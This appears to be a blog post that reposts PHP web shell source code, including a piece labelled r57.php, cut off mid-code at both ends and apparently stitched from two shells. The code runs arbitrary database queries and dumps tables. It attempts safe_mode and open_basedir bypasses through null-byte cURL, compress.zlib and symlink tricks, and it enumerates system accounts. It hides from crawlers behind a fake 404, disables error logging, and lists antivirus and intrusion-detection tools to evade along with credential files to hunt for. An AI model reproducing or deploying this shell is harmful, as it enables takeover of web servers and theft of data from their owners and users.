if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
break;
case 'PostgreSQL':
$this->num_rows=@pg_num_rows($this->res);
$this->num_fields=@pg_num_fields($this->res);
while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
@pg_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'Oracle':
$this->num_fields=@ocinumcols($this->res);
while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
@ocifreestatement($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'MySQLi':
$this->num_rows=@mysqli_num_rows($this->res);
$this->num_fields=@mysqli_num_fields($this->res);
while(false !== ($this->rows[] = @mysqli_fetch_assoc($this->res)));
@mysqli_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'mSQL':
$this->num_rows=@msql_num_rows($this->res);
$this->num_fields=@msql_num_fields($this->res);
while(false !== ($this->rows[] = @msql_fetch_array($this->res)));
@msql_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'SQLite':
$this->num_rows=@sqlite_num_rows($this->res);
$this->num_fields=@sqlite_num_fields($this->res);
while(false !== ($this->rows[] = @sqlite_fetch_array($this->res)));
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
}
return 0;
}
function dump($table)
{
if(empty($table)) return 0;
$this->dump=array();
$this->dump[0] = '##';
$this->dump[1] = '## --------------------------------------- ';
$this->dump[2] = '## Created: '.date ("d/m/Y H:i:s");
$this->dump[3] = '## Database: '.$this->base;
$this->dump[4] = '## Table: '.$table;
$this->dump[5] = '## --------------------------------------- ';
switch($this->db)
{
case 'MySQL':
$this->dump[0] = '## MySQL dump';
if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
if(!$this->get_result()) return 0;
$this->dump[] = $this->rows[0]['Create Table'];
$this->dump[] = '## --------------------------------------- ';
if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
$this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'MSSQL':
$this->dump[0] = '## MSSQL dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'PostgreSQL':
$this->dump[0] = '## PostgreSQL dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'Oracle':
$this->dump[0] = '## ORACLE dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'MySQLi':
$this->dump[0] = '## MySQLi dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysqli_real_escape_string($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'mSQL':
$this->dump[0] = '## mSQL dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'SQLite':
$this->dump[0] = '## SQLite dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
default:
return 0;
break;
}
return 1;
}
function close()
{
switch($this->db)
{
case 'MySQL':
@mysql_close($this->connection);
break;
case 'MSSQL':
@mssql_close($this->connection);
break;
case 'PostgreSQL':
@pg_close($this->connection);
break;
case 'Oracle':
@oci_close($this->connection);
break;
case 'MySQLi':
@mysqli_close($this->connection);
break;
case 'mSQL':
@msql_close($this->connection);
break;
case 'SQLite':
@sqlite_close($this->connection);
break;
}
}
function affected_rows()
{
switch($this->db)
{
case 'MySQL':
return @mysql_affected_rows($this->res);
break;
case 'MSSQL':
return @mssql_affected_rows($this->res);
break;
case 'PostgreSQL':
return @pg_affected_rows($this->res);
break;
case 'Oracle':
return @ocirowcount($this->res);
break;
case 'MySQLi':
return @mysqli_affected_rows($this->res);
break;
case 'mSQL':
return @msql_affected_rows($this->res);
break;
case 'SQLite':
return @sqlite_changes($this->res);
break;
default:
return 0;
break;
break;
case 'cURL':
if(empty($_POST['egy_spider'])){
} else {
$curl=$_POST['egy_spider'];
$ch =curl_init("file:///".$curl."\x00/../../../../../../../../../../../../".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
echo "</textarea></CENTER>";
}
break;
case 'copy':
if(empty($snn)){
if(empty($_GET['snn'])){
if(empty($_POST['snn'])){
} else {
$u1p=$_POST['snn'];
}
} else {
$u1p=$_GET['snn'];
}
}
$u1p=""; // File to Include... or use _GET _POST
$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp
$temp=tempnam($tymczas, "cx");
if(copy("compress.zlib://".$snn, $temp)){
$zrodlo = fopen($temp, "r");
$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);
echo "".htmlspecialchars($tekst)."";
unlink($temp);
echo "</textarea></CENTER>";
}
break;
case 'ini_restore':
if(empty($_POST['ini_restore'])){
} else {
$ini=$_POST['ini_restore'];
echo ini_get("safe_mode");
echo ini_get("open_basedir");
require_once("$ini");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["egy"]);
echo "</textarea></CENTER>";
}
break;
case 'glob':
function reg_glob()
{
$chemin=$_REQUEST['glob'];
$files = glob("$chemin*");
foreach ($files as $filename) {
echo "$filename\n";
}
}
if(isset($_REQUEST['glob']))
{
reg_glob();
}
break;
case 'sym1':
if(empty($_POST['sym1p'])){
} else {
$symp=$_POST['sym1p'];
}
if(empty($_POST['sym1p2'])){
} else {
$symp2=$_POST['sym1p2'];
symlink("a/a/a/a/a/a/", "dummy");
symlink("dummy".$symp2."".$symp."", "xxx");
unlink("dummy");
while (1) {
symlink(".", "dummy");
}
}
break;
case 'sym2':
@include(xxx);
break;
case 'plugin':
if ($_POST['plugin'] ){
for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd
$ara = posix_getpwuid($uid);
if (!empty($ara)) {
while (list ($key, $val) = each($ara)){
print "$val:";
}
print "\n";
}
}
echo "</textarea>";
}
}
}
}
if(isset($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
{
if($file=moreread($_POST['d_name'])){ $filedump = $file; }
else if ($file=readzlib($_POST['d_name'])) { $filedump = $file; } else { err(1,$_POST['d_name']); $_POST['cmd']=""; }
if(!empty($_POST['cmd']))
{
@ob_clean();
$filename = @basename($_POST['d_name']);
$content_encoding=$mime_type='';
compress($filename,$filedump,$_POST['compress']);
if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
header("Content-type: ".$mime_type);
header("Content-disposition: attachment; filename=\"".$filename."\";");
echo $filedump;
exit();
}
}
if(isset($_GET['1'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); }
if (isset($_POST['cmd']) && $_POST['cmd']=="db_query")
{
echo $head;
$sql = new my_sql();
$sql->db = $_POST['db'];
$sql->host = $_POST['db_server'];
$sql->port = $_POST['db_port'];
$sql->user = $_POST['mysql_l'];
$sql->pass = $_POST['mysql_p'];
$sql->base = $_POST['mysql_db'];
$querys = @explode(';',$_POST['db_query']);
echo '<body bgcolor=#e4e0d8>';
if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
else
{
if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";
else
{
foreach($querys as $num=>$query)
{
if(strlen($query)>5)
{
echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
switch($sql->query($query))
{
case '0':
echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
break;
case '1':
if($sql->get_result())
{
echo "<table width=100%>";
foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
$keys = @implode(" </b></font></td><td bgcolor=#333333><font face=Verdana size=-2><b> ", $sql->columns);
echo "<tr><td bgcolor=#333333><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>";
for($i=0;$i<$sql->num_rows;$i++)
{
foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
$values = @implode(" </font></td><td><font face=Verdana size=-2> ",$sql->rows[$i]);
echo '<tr><td><font face=Verdana size=-2> '.$values.' </font></td></tr>';
}
echo "</table>";
}
break;
case '2':
$ar = $sql->affected_rows()?($sql->affected_rows()):('0');
echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
break;
}
}
}
}
}
echo "<br><form name=form method=POST>";
echo in('hidden','db',0,$_POST['db']);
echo in('hidden','db_server',0,$_POST['db_server']);
echo in('hidden','db_port',0,$_POST['db_port']);
echo in('hidden','mysql_l',0,$_POST['mysql_l']);
echo in('hidden','mysql_p',0,$_POST['mysql_p']);
echo in('hidden','mysql_db',0,$_POST['mysql_db']);
echo in('hidden','cmd',0,'db_query');
echo "<div align=center>";
echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
echo "</form>";
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die();
}
if(isset($_GET['12']))
{
@unlink(__FILE__);
}
if(isset($_GET['11']))
{
@unlink($tempdir.'bdpl');
@unlink($tempdir.'back');
@unlink($tempdir.'bd');
@unlink($tempdir.'bd.c');
@unlink($tempdir.'dp');
@unlink($tempdir.'dpc');
@unlink($tempdir.'dpc.c');
@unlink($tempdir.'prxpl');
@unlink($tempdir.'grep.txt');
}
if(isset($_GET['2']))
{
echo $head;
function U_value($value)
{
if ($value == '') return '<i>no value</i>';
if (@is_bool($value)) return $value ? 'TRU
written by ejam at 04:13 am
Make a comment Permalink
r57.php
Saturday, December 03, 2011
<?php
if(preg_match("/bot/", $_SERVER[HTTP_USER_AGENT])) {header("HTTP/1.0 404");exit("<h1>Not Found</h1>");}
$language='eng';
$auth = 0;
$name='';
$pass='';
//ru_RU, //ru_RU.cp1251, //ru_RU.iso88595, //ru_RU.koi8r, //ru_RU.utf8
@setlocale(LC_ALL,'ru_RU.cp1251');
@ini_restore("safe_mode");
@ini_restore("open_basedir");
@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");
@ini_restore("disable_functions");
@ini_restore("allow_url_fopen");
if(@function_exists('ini_set'))
{
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('file_uploads',1);
@ini_set('allow_url_fopen',1);
}
else
{
@ini_alter('error_log',NULL);
@ini_alter('log_errors',0);
@ini_alter('file_uploads',1);
@ini_alter('allow_url_fopen',1);
}
error_reporting(E_ALL);
/* ??? ????? */
$userful = array('gcc',', lcc',', cc',', ld',', php',', perl',', python',', ruby',', make',', tar',', gzip',', bzip',', bzip2',', nc',', locate',', suidperl');
$danger = array(', kav',', nod32',', bdcored',', uvscan',', sav',', drwebd',', clamd',', rkhunter',', chkrootkit',', iptables',', ipfw',', tripwire',', shieldcc',', portsentry',', snort',', ossec',', lidsadm',', tcplodg',', sxid',', logcheck',', logwatch',', sysmask',', zmbscap',', sawmill',', wormscan',', ninja');
$tempdirs = array(@ini_get('session.save_path').'/',@ini_get('upload_tmp_dir').'/','/tmp/','/dev/shm/','/var/tmp/');
$downloaders = array('wget','fetch','lynx','links','curl','get');
/* ??? ?????? ???????? ???? ????? realpath() */
//$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
//$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyz";
//$chars_rlph = "_-.ABCDEFGHIJKLMNOPQRSTUVWXYZ";
//$chars_rlph = "_-.abcdefghijklnmopqrstuvwxyz";
//$chars_rlph = "_-.01234567890";
$chars_rlph = "abcdefghijklnmopqrstuvwxyz";
$presets_rlph = array('index.php','.htaccess','.htpasswd','httpd.conf','vhosts.conf','cfg.php','config.php','config.inc.php','config.default.php','config.inc.php',
'shadow','passwd','.bash_history','.mysql_history','master.passwd','user','admin','password','administrator','phpMyAdmin','security','php.ini','cdrom','root',
'my.cnf','pureftpd.conf','proftpd.conf','ftpd.conf','resolv.conf','login.conf','smb.conf','sysctl.conf','syslog.conf','access.conf','accounting.log','home','htdocs',
'access','auth','error','backup','data','back','sysconfig','phpbb','phpbb2','vbulletin','vbullet','phpnuke','cgi-bin','html','robots.txt','billing');
/******************************************************************************************************/
define("starttime",@getmicrotime());
if((!@function_exists('ini_get')) || (@ini_get('open_basedir')!=NULL) || (@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;} else{$open_basedir=0;};
set_magic_quotes_runtime(0);
@set_time_limit(0);
if(@function_exists('ini_set'))
{
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
}
else
{
@ini_alter('max_execution_time',0);
@ini_alter('output_buffering',0);
}
$safe_mode = @ini_get('safe_mode');
#if(@function_exists('ini_get')){$safe_mode = @ini_get('safe_mode');}else{$safe_mode=1;};
$version = '1.42';
if(@version_compare(@phpversion(), '4.1.0') == -1)
{
$_POST = &$HTTP_POST_VARS;
$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
$_COOKIE = &$HTTP_COOKIE_VARS;
}
if (@get_magic_quotes_gpc())
{
foreach ($_POST as $k=>$v)
{
$_POST[$k] = stripslashes($v);
}
foreach ($_COOKIE as $k=>$v)
{
$_COOKIE[$k] = stripslashes($v);
}
}
if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
{
header('WWW-Authenticate: Basic realm="HELLO!"');
header('HTTP/1.0 401 Unauthorized');
exit("<h1>Access Denied</h1>");
}
}
if(!isset($_COOKIE['tempdir'],$_COOKIE['select_tempdir'])) {
$tempdir='./';
$select_tempdir = '<select name=tempdir><option value="./">./</option>';
foreach( $tempdirs as $item) {
if(@is_writable($item)){$select_tempdir .= '<option value="'.$item.'">'.$item.'</option>';$tempdir=$item;}
}
$select_tempdir .= '</select>';
setcookie('tempdir',$tempdir);
setcookie('select_tempdir',$select_tempdir);
}else{
if(isset($_POST['tempdir'])){$tempdir = $_POST['tempdir'];}else{$tempdir = $_COOKIE['tempdir'];}
$select_tempdir = $_COOKIE['select_tempdir'];
}
$head = '
<html>
<head>
<title>Not Found</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<STYLE>
tr {
BORDER-RIGHT: #aaaaaa 1px solid;
BORDER-TOP: #eeeeee 1px solid;
BORDER-LEFT: #eeeeee 1px solid;
BORDER-BOTTOM: #aaaaaa 1px solid;
color: #000000;
}
td {
BORDER-RIGHT: #aaaaaa 1px solid;
BORDER-TOP: #eeeeee 1px solid;
BORDER-LEFT: #eeeeee 1px solid;
BORDER-BOTTOM: #aaaaaa 1px solid;
color: #000000;
}
.table1 {
BORDER: 0px;
BACKGROUND-COLOR: #D4D0C8;
color: #000000;
}
.td1 {
BORDER: 0px;
font: 7pt Verdana;
color: #000000;
}
.tr1 {
BORDER: 0px;
color: #000000;
}
table {
BORDER: #eeeeee 1px outset;
BACKGROUND-COLOR: #D4D0C8;
color: #000000;
}
input {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: 8pt Verdana;
color: #000000;
}
select {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: 8pt Verdana;
color: #000000;;
}
submit {
BORDER: buttonhighlight 2px outset;
BACKGROUND-COLOR: #e4e0d8;
width: 30%;
color: #000000;
}
textarea {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: Fixedsys bold;
color: #000000;
}
BODY {
margin: 1px;
color: #000000;
background-color: #e4e0d8;
}
A:link {COLOR:red; TEXT-DECORATION: none}
A:visited { COLOR:red; TEXT-DECORATION: none}
A:active {COLOR:red; TEXT-DECORATION: none}
A:hover {color:blue;TEXT-DECORATION: none}
</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
document.getElementById(id).style.display = \'none\';
document.cookie=id+\'=0;\';
}
function show_div(id)
{
document.getElementById(id).style.display = \'block\';
document.cookie=id+\'=1;\';
}
function change_divst(id)
{
if (document.getElementById(id).style.display == \'none\')
show_div(id);
else
hide_div(id);
}
</script>';
class zipfile
{
var $datasec = array();
var $ctrl_dir = array();
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
var $old_offset = 0;
function unix2DosTime($unixtime = 0) {
$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
if ($timearray['year'] < 1980) {
$timearray['year'] = 1980;
$timearray['mon'] = 1;
$timearray['mday'] = 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
}
return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
}
function addFile($data, $name, $time = 0)
{
$name = str_replace('\\', '/', $name);
$dtime = dechex($this->unix2DosTime($time));
$hexdtime = '\x' . $dtime[6] . $dtime[7]
. '\x' . $dtime[4] . $dtime[5]
. '\x' . $dtime[2] . $dtime[3]
. '\x' . $dtime[0] . $dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');
$fr = "\x50\x4b\x03\x04";
$fr .= "\x14\x00";
$fr .= "\x00\x00";
$fr .= "\x08\x00";
$fr .= $hexdtime;
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
$c_len = strlen($zdata);
$fr .= pack('V', $crc);
$fr .= pack('V', $c_len);
$fr .= pack('V', $unc_len);
$fr .= pack('v', strlen($name));
$fr .= pack('v', 0);
$fr .= $name;
$fr .= $zdata;
$this -> datasec[] = $fr;
$cdrec = "\x50\x4b\x01\x02";
$cdrec .= "\x00\x00";
$cdrec .= "\x14\x00";
$cdrec .= "\x00\x00";
$cdrec .= "\x08\x00";
$cdrec .= $hexdtime;
$cdrec .= pack('V', $crc);
$cdrec .= pack('V', $c_len);
$cdrec .= pack('V', $unc_len);
$cdrec .= pack('v', strlen($name) );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('V', 32 );
$cdrec .= pack('V', $this -> old_offset );
$this -> old_offset += strlen($fr);
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
function file()
{
$data = implode('', $this -> datasec);
$ctrldir = implode('', $this -> ctrl_dir);
return
$data .
$ctrldir .
$this -> eof_ctrl_dir .
pack('v', sizeof($this -> ctrl_dir)) .
pack('v', sizeof($this -> ctrl_dir)) .
pack('V', strlen($ctrldir)) .
pack('V', strlen($data)) .
"\x00\x00";
}
}
function compress(&$filename,&$filedump,$compress)
{
global $content_encoding;
global $mime_type;
if ($compress == 'bzip' && @function_exists('bzcompress'))
{
$filename .= '.bz2';
$mime_type = 'application/x-bzip2';
$filedump = bzcompress($filedump);
}
else if ($compress == 'gzip' && @function_exists('gzencode'))
{
$filename .= '.gz';
$content_encoding = 'x-gzip';
$mime_type = 'application/x-gzip';
$filedump = gzencode($filedump);
}
else if ($compress == 'zip' && @function_exists('gzcompress'))
{
$filename .= '.zip';
$mime_type = 'application/zip';
$zipfile = new zipfile();
$zipfile -> addFile($filedump, substr($filename, 0, -4));
$filedump = $zipfile -> file();
}
else
{
$mime_type = 'application/octet-stream';
}
}
function moreread($temp){
global $lang,$language;
$str='';
if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('feof')&&@function_exists('fclose') && ($ffile = @fopen($temp, "r"))){
if($ffile){
while(!@feof($ffile)){$str .= @fgets($ffile);};
fclose($ffile);
}
}elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesize')&&($ffile = @fopen($temp, "r"))){
if($ffile){
$str = @fread($ffile, @filesize($temp));
@fclose($ffile);
}
}elseif(@function_exists('file')&&($ffiles = @file($temp))){
foreach ($ffiles as $ffile) { $str .= $ffile; }
}elseif(@function_exists('file_get_contents')){
$str = @file_get_contents($temp);
}elseif(@function_exists('readfile')){
$str = @readfile($temp);
}elseif(@function_exists('highlight_file')){
$str = @highlight_file($temp);
}elseif(@function_exists('show_source')){
$str = @show_source($temp);
}else{echo $lang[$language.'_text56'];}
return $str;
}
function readzlib($filename,$temp=''){
global $lang,$language;
$str='';
if(!$temp) {$temp=tempnam(@getcwd(), "copytemp");};
if(@copy("compress.zlib://".$filename, $temp)) {
$str = moreread($temp);
} else echo $lang[$language.'_text119'];
@unlink($temp);
return $str;
}
function morewrite($temp,$str='')
{
global $lang,$language;
if(@function_exists('fopen') && @function_exists('fwrite') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){
if($ffile){
@fwrite($ffile,$str);
@fclose($ffile);
}
}elseif(@function_exists('fopen') && @function_exists('fputs') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){
if($ffile){
@fputs($ffile,$str);
@fclose($ffile);
}
}elseif(@function_exists('file_put_contents')){
@file_put_contents($temp,$str);
}else return 0;
return 1;
}
function mailattach($to,$from,$subj,$attach)
{
$headers = "From: $from\r\n";
$headers .= "MIME-Version: 1.0\r\n";
$headers .= "Content-Type: ".$attach['type'];
$headers .= "; name=\"".$attach['name']."\"\r\n";
$headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
$headers .= chunk_split(base64_encode($attach['content']))."\r\n";
if(mail($to,$subj,"",$headers)) { return 1; }
return 0;
}
class my_sql
{
var $host = 'localhost';
var $port = '';
var $user = '';
var $pass = '';
var $base = '';
var $db = '';
var $connection;
var $res;
var $error;
var $rows;
var $columns;
var $num_rows;
var $num_fields;
var $dump;
function connect()
{
switch($this->db)
{
case 'MySQL':
if(empty($this->port)) { $this->port = '3306'; }
if(!@function_exists('mysql_connect')) return 0;
$this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
if(is_resource($this->connection)) return 1;
break;
case 'MSSQL':
if(empty($this->port)) { $this->port = '1433'; }
if(!@function_exists('mssql_connect')) return 0;
$this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
if($this->connection) return 1;
break;
case 'PostgreSQL':
if(empty($this->port)) { $this->port = '5432'; }
$str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
if(!@function_exists('pg_connect')) return 0;
$this->connection = @pg_connect($str);
if(is_resource($this->connection)) return 1;
break;
case 'Oracle':
if(!@function_exists('ocilogon')) return 0;
$this->connection = @ocilogon($this->user, $this->pass, $this->base);
if(is_resource($this->connection)) return 1;
break;
case 'MySQLi':
if(empty($this->port)) { $this->port = '3306'; }
if(!@function_exists('mysqli_connect')) return 0;
$this->connection = @mysqli_connect($this->host,$this->user,$this->pass,$this->base,$this->port);
if(is_resource($this->connection)) return 1;
break;
case 'mSQL':
if(!@function_exists('msql_connect')) return 0;
$this->connection = @msql_connect($this->host.':'.$this->port,$this->user,$this->pass);
if(is_resource($this->connection)) return 1;
break;
case 'SQLite':
if(!@function_exists('sqlite_open')) return 0;
$this->connection = @sqlite_open($this->base);
if(is_resource($this->connection)) return 1;
break;
}
return 0;
}
function select_db()
{
switch($this->db)
{
case 'MySQL':
if(@mysql_select_db($this->base,$this->connection)) return 1;
break;
case 'MSSQL':
if(@mssql_select_db($this->base,$this->connection)) return 1;
break;
case 'PostgreSQL':
return 1;
break;
case 'Oracle':
return 1;
break;
case 'MySQLi':
return 1;
break;
case 'mSQL':
if(@msql_select_db($this->base,$this->connection)) return 1;
break;
case 'SQLite':
return 1;
break;
}
return 0;
}
function query($query)
{
$this->res=$this->error='';
switch($this->db)
{
case 'MySQL':
if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
{
$this->error = @mysql_error($this->connection);
return 0;
}
else if(is_resource($this->res)) { return 1; }
return 2;
break;
case 'MSSQL':
if(false===($this->res=@mssql_query($query,$this->connection)))
{
$this->error = 'Query error';
return 0;
}
else if(@mssql_num_rows($this->res) > 0) { return 1; }
return 2;
break;
case 'PostgreSQL':
if(false===($this->res=@pg_query($this->connection,$query)))
{
$this->error = @pg_last_error($this->connection);
return 0;
}
else if(@pg_num_rows($this->res) > 0) { return 1; }
return 2;
break;
case 'Oracle':
if(false===($this->res=@ociparse($this->connection,$query)))
{
$this->error = 'Query parse error';
}
else
{
if(@ociexecute($this->res))
{
if(@ocirowcount($this->res) != 0) return 2;
return 1;
}
$error = @ocierror();
$this->error=$error['message'];
}
break;
case 'MySQLi':
if(false===($this->res=@mysqli_query($this->connection,$query)))
{
$this->error = @mysqli_error($this->connection);
return 0;
}
else if(is_resource($this->res)) { return 1; }
return 2;
break;
case 'mSQL':
if(false===($this->res=@msql_query($query,$this->connection)))
{
$this->error = @msql_error($this->connection);
return 0;
}
else if(is_resource($this->res)) { return 1; }
return 2;
break;
case 'SQLite':
if(false===($this->res=@sqlite_query($this->connection,$query)))
{
$this->error = @sqlite_error_string($this->connection);
return 0;
}
else if(is_resource($this->res)) { return 1; }
return 2;
break;
}
return 0;
}
function get_result()
{
$this->rows=array();
$this->columns=array();
$this->num_rows=$this->num_fields=0;
switch($this->db)
{
case 'MySQL':
$this->num_rows=@mysql_num_rows($this->res);
$this->num_fields=@mysql_num_fields($this->res);
while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
@mysql_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'MSSQL':
$this->num_rows=@mssql_num_rows($this->res);
$this->num_fields=@mssql_num_fields($this->res);
while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
@mssql_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
break;
case 'PostgreSQL':
$this->num_rows=@pg_num_rows($this->res);
$this->num_fields=@pg_num_fields($this->res);
while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
@pg_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'Oracle':
$this->num_fields=@ocinumcols($this->res);
while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
@ocifreestatement($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'MySQLi':
$this->num_rows=@mysqli_num_rows($this->res);
$this->num_fields=@mysqli_num_fields($this->res);
while(false !== ($this->rows[] = @mysqli_fetch_assoc($this->res)));
@mysqli_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'mSQL':
$this->num_rows=@msql_num_rows($this->res);
$this->num_fields=@msql_num_fields($this->res);
while(false !== ($this->rows[] = @msql_fetch_array($this->res)));
@msql_free_result($this->res);
